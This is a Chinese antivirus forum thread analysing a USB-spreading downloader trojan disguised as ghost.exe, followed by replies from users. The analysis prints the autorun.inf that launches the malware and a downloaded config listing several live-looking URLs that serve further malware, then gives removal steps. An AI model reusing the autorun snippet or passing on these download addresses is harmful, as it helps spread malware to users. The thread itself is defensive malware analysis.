瑞星卡卡安全论坛

今天吃饭前..接到某位mm 求助..说电脑又中毒了..
按照习惯先叫他扫个SREng 的 log 看看..意外的发现了个 ghost.exe 和 四五个小病毒..
就跟她拿了 ghost.exe 看看.. 又是一个 U 盘病毒 还会下载病毒..

现在写一点点的小分析 ..目前瑞星不报..在线扫了扫发现就几家报了..

运行ghost.exe 后..
生成
ghost.exe.bat(删除自身)
C:\WINDOWS\system\conime.exe
C:\Program Files\WinRAR\WinRAR.exe.tmp

每个盘符下释放(c d e f g h j k )
autorun.inf
ghost.exe

autorun.inf 文件内容
[AutoRun]
OPEN=ghost.exe
shellexecute=ghost.exe
shell\打开(&O)\command=ghost.exe

连入 http://www.dj916.com/ie.txt 下载..
ie.txt 内容
[main]
服务文件更新=5
服务文件地址=http://www.86dy.net/c123.exe

下载者是否更新=4
下载个数=7                       

文件1=http://222.220.16.185/data6/jwm.exe
更新1=6
文件2=http://222.220.16.185/data6/wol.exe
更新2=6
文件3=http://222.220.16.185/data6/wo3.exe
更新3=6
文件4=http://222.220.16.185/data6/mir.exe
更新4=6
文件5=http://222.220.16.185/data6/mhh.exe
更新5=6
文件6=http://222.220.16.181/ienet.exe
更新6=6
文件7=http://222.220.16.185/data6/zt3.exe
更新7=6

这些网址都是下载下来的病毒..

没写入注册表..

但是我用反汇编看了看..
这玩意应该修改了
讯雷 QQ WINRAR 的注册表 ..

处理方法(不包括下载下来的病毒)
右键=>打开进入每个盘符=>删除
autorun.inf
ghost.exe

删除文件
C:\WINDOWS\system\conime.exe

建议重装 qq 讯雷 WINRAR


最后我还发现个玩意
00407345  MOV EDX,123.004076B4                      你好瑞星 我喜欢你~

作者难不成暗恋瑞星??

汗！这情书有风格

这丫的病毒，也太变态了吧……

新手极容易把这个文件看成ghost软件

hao

汗！ 五花八门的病毒

郁闷啊。我也中了这个病毒。装过了系统。可是杀不掉。

一直条出conime.exe-没有软盘  驱动器中没有软盘。请在驱动器G：中插入软盘

不知道怎么回事

强,给瑞星的情书真强

强!

今天没来反病毒版置顶贴又翻了翻

呵呵.病毒就喜欢这种手法了.,一个字母之差就想差很远了.

学习

学习一下!

看来必须要学学汇编了。

病毒已经解决了.

强

这病毒还会导致你打不开任何一个盘.右键也没用.

别吓唬我啊,还以为是GHOST克隆软件呢,还好没发现你说的文件,放心了~~~~~~~~~~~~~~~~~~~~~

好象小弟也中招了,我的网速总会在开机会就滑落直至网页都开不了,


有没有兄弟帮忙分析指点下啊@@!!~~~~~

手动好
有时我看到几个病毒可是瑞星看不到（最新版）
人家卡巴一天多次更新哇

这个坏病毒!

卡巴更新是快呀.前天我测试了还查不出来,今天就能杀掉了
卡巴真的厉害.

附件: 65044020061223184551.BMP